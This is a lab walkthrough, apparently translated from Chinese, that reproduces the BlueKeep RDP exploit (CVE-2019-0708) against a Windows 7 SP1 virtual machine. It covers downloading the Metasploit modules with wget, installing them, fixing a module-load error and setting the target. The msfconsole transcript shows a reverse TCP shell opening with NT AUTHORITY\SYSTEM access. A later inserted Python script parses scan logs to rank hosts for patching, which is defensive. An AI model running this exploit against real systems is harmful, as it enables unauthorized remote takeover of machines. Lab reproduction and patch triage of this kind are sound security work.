Contents
  1. Environment setup
  2. Attack

Fixing the module-import failure and the blue screen problem (so far reproduced successfully only on win7_ultimate_sp1; other Win7 versions and 2008 all blue-screen)

This vulnerability has been flooding my feed, but after actually testing it I found it is not in the same league as MS17-010: the conditions for exploitation are quite restrictive and only a few versions can be exploited successfully. I hope the exp developers keep adding more targets.

Environment setup

Target machine:

cn_windows_7_ultimate_with_sp1_x64

(Tested: this version reproduces successfully and yields a shell; other versions blue-screen.) Configure the VM as 2h 2g (2 vCPUs, 2 GB RAM).


Downloading the msf exploit and copying the files

```bash
#!/bin/bash
# Fetch the RDP mixin, the two scanners and the exploit from the pinned metasploit-framework commit
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

# Copy them into the framework tree; the rdp module directories may not exist yet
mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
```

Windows 7 environment setup

Enable Remote Desktop on the Win7 machine and turn off the firewall.


Loading the exp in msf

```text
root@kali:~# msfconsole
msf > reload_all
[*] Reloading modules from all module paths...
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bulekeep_rce.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP

       =[ metasploit v4.16.48-dev                         ]
+ -- --=[ 1749 exploits - 1001 auxiliary - 302 post       ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
```

The error "WARNING! The following modules could not be loaded!" appeared, telling us that the newly added modules could not be loaded.

Searching Baidu turned up very few solutions to this problem. I guessed it might be a version issue, and after reinstalling Kali to the latest 2019.03 release the problem did not reappear.

Attack

```text
root@kali:~# msfconsole
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.244.147
rhosts => 192.168.244.147
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.244.147  yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 192.168.244.145:4444
[*] 192.168.244.147:3389 - Detected RDP on 192.168.244.147:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.244.147:3389 - The target is vulnerable.
[*] 192.168.244.147:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.244.147:3389 - Surfing channels ...
[*] 192.168.244.147:3389 - Lobbing eggs ...
[*] 192.168.244.147:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 1 opened (192.168.244.145:4444 -> 192.168.244.147:49160) at 2019-09-09 20:59:20 -0400



C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```

Exploitation succeeded.
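As an added example (not part of the original write-up or the Metasploit module), the small Python triage script below parses detection lines in the format shown above and ranks hosts by exposure: the state exploited here, an unpatched 6.1.7601 build with NLA off, is reachable before any authentication. The sample log lines are constructed, and the wording of a "not vulnerable" verdict line is an assumption.

```python
import re

# Line formats taken from the module output shown in the write-up. The wording of a
# "not vulnerable" verdict line is an assumption; only "[+] ... vulnerable." is matched.
DETECT_RE = re.compile(
    r"Detected RDP on (?P<host>[\d.]+):(?P<port>\d+) "
    r"\(Windows version: (?P<ver>[\d.]+)\) \(Requires NLA: (?P<nla>Yes|No)\)")
VULN_RE = re.compile(r"^\[\+\] (?P<host>[\d.]+):\d+ - The target is vulnerable\.")

# Constructed sample: three hosts, not real scan data.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 192.168.244.145:4444
[*] 192.168.244.147:3389 - Detected RDP on 192.168.244.147:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.244.147:3389 - The target is vulnerable.
[*] 192.168.244.150:3389 - Detected RDP on 192.168.244.150:3389 (Windows version: 6.1.7601) (Requires NLA: Yes)
[+] 192.168.244.150:3389 - The target is vulnerable.
[*] 192.168.244.151:3389 - Detected RDP on 192.168.244.151:3389 (Windows version: 10.0.17763) (Requires NLA: Yes)
[-] 192.168.244.151:3389 - The target is not vulnerable.
"""


def parse_msf_log(text):
    """Collect per host: reported build, whether NLA is required, and the module's verdict."""
    hosts = {}
    for line in text.splitlines():
        m = DETECT_RE.search(line)
        if m:
            hosts[m["host"]] = {"version": m["ver"], "nla": m["nla"] == "Yes", "vulnerable": False}
            continue
        m = VULN_RE.match(line)
        if m and m["host"] in hosts:
            hosts[m["host"]]["vulnerable"] = True
    return hosts


def triage(hosts):
    """Rank hosts for remediation. CVE-2019-0708 is triggered before authentication, so an
    unpatched host that does not require NLA is exactly the state the write-up exploited."""
    order = {"critical": 0, "high": 1, "info": 2}
    ranked = []
    for host, f in hosts.items():
        if f["vulnerable"] and not f["nla"]:
            level, why = "critical", "unpatched and reachable pre-auth (NLA off): patch and enable NLA"
        elif f["vulnerable"]:
            level, why = "high", "unpatched; NLA forces authentication first but is not a fix"
        else:
            level, why = "info", "not flagged as vulnerable by the module"
        ranked.append((host, level, why))
    return sorted(ranked, key=lambda r: order[r[1]])
```

Feed it the saved console output of a scanner run (e.g. `spool` in msfconsole) to get a remediation order across many hosts.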


The available values of the target option are as follows:

```text
Available targets:
   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
```

Choose the one that matches your environment.
